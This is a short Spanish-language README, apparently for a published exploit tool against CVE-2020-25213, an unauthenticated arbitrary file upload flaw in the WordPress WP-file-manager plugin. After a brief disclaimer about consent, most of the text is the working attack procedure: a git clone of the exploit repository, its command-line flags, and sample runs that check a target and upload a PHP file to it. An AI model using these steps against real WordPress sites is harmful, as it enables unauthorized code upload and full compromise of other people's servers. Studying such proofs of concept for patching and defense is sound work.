
https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8
El plugin de WordPress WP-file-manager (<6.9) es vulnerable a la subida arbitraria de archivos sin autenticación, lo que resulta en el compromiso total del sistema.
Para más detalles, consulta mi writeup publicado aquí
No he descubierto esta vulnerabilidad ni me atribuyo mérito alguno por este CVE. Solo he creado el exploit después de analizar la descripción disponible en varios blogs como wordfence, seravo con el objetivo de que los lectores entiendan cómo crear un POC con solo analizar la descripción de la vulnerabilidad.
No soy responsable de ningún daño causado a una organización que utilice este exploit y aconsejo a los lectores que no exploten esta vulnerabilidad sin el consentimiento por escrito de la organización, ya que podría exponerla a ataques de otros hackers.
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
-u|--wp_url Wordpress target url
-f|--upload_file Absolute location of local file to upload on the target.
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
